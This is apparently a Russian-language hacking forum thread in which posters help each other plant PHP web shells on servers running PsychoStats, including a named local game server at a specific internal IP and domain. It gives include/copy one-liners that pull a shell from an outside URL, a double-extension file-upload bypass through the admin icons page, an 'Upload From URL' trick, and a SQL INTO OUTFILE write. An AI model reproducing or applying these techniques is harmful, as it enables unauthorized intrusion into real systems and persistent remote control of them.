Scipio о млин точно ...куль сеньк всем...

слу ... а как терь нормальный пхп файлик закинуть на машину... плз подкинь идею

<?php include("http://путь до шелла");?>
или
<?php copy("http://путь до шелла","shelcheng.php");?>
это тоже в хекс исли вариант с copy то он шелл скопирует в текущую папку
а с инклюдом и так все понятно

__________________
Карфаген должен быть разрушен...

драсьте.
у нас есть отдельный "сервер" для игр. виден есессно только в локалке, соответственно адрес 172.17.1.11, так же на сайт можно пройти по сцыле http://games.k26.ru (опять же только в локалке)

психостатс расположен в http://172.17.1.11/stats
попробовал сплоит с первой страницы - теперь по http://172.17.1.11/stats/ выдет кучу ошибок и ничего не открыват, по http://games.k26.ru/stats/ все отлично открывается.

пробовал как в видео. в общем не могу понять. куда можно залить файл. выяснил полный путь сайта. c:/inetpub/wwwroot/stats. видно что это iis. пытался залить файл куда только можно, ничего не получается. может быть потому, что остальные директории запрещены на заливку файлов.
так же есть http://games.k26.ru/wow (сервер вов). так же пытался туда залить - безуспешно.

и вот думаю - куда лить файл? существуют ли стандартные директории в iis, куда можно лить файлы?

Lordick, найти папку на которую точно есть доступ на запись. Такие папки обычно являются папками хранения всяких аватаров, картинок, вложений и тп. Поищи такие папки в психостате. Если есть форум, посмотри там такую папку.
А вообще, я смотрю сервер на винде стоит, там нет таких разграничений на прав, как в *никсах и все папки открыты на запись. Magic Quotes может быть включен=>фильтруются ковычки=>запрос некорректен.

помогите как слить шелл с удаленного серва?
папку с правами нашел.

Нашёл способ...
Заходим в админку > значки, переименовываем шелл в что-то типо shell.PHP.hgfgif, заливаем. Главное чтобы расширение оканчивалось на gif Вот собственно и получаем шелл [path]/images/icons/shell.PHP.hgfgif.

Объясняю как это происходит:
движок проверяет только три последних символа в расширении файла, поэтому делаем такое расширение PHP.hgfgif, предварительно поставив расширение .PHP. и он этот файл легко пропускает. Для Apach'а расширение .hgfgif неизвестно и поэтому он смотрит на расширение левее и интерпретирует его как php-скрипт!
Проверяйте: может и на других двигах сработает...

Короче такая ситуация.
Получил доступ к админке.
SQL которые были описаны до этого не работают.
Зашел в админку, добавил расширение для картинок - png, jpg, gif, php
Так. Теперь в icons (где заливать файлы). Такие методы, как менять расширение, как сказал InFlame - file.PHP.asdgif - не катят. Нашел только такой способ:
Залил себе на сайт файл. script.php и решил его сразу залить через Upload From URL. - вывел ошибку The URL does not point to an image. Немного подумал. Сделал содержимое файла таким:
Теперь скормил его Upload From URL и файл успешно залился. Переш на него - site.ru/stats/img/icons/script.php и Мне вывело OK!
Я обрадовался, начал кормить туда шелл. Но ВОТ ТАКАЯ БЕДА!
Содержимое файла оказывается таким, как он выполняется на моем хосте. Тоесть. Если я напимер сделаю <?php system('dir'); ?> То на хосте жертвы будет красоваться содердимое моего хоста.
Файл получается статичным.
Прошу помощи ))))))))))))))

echo '<?phpinfo();?>'; ?
/add по сабжу, дописать свои данные в файл из подзапроса можно так
order by (select 1 into outfile 'lala' lines terminated by 'php')
или вообще обойтись без подзапроса (выйдет даже короче)

__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..

:-* :-* :-* :-*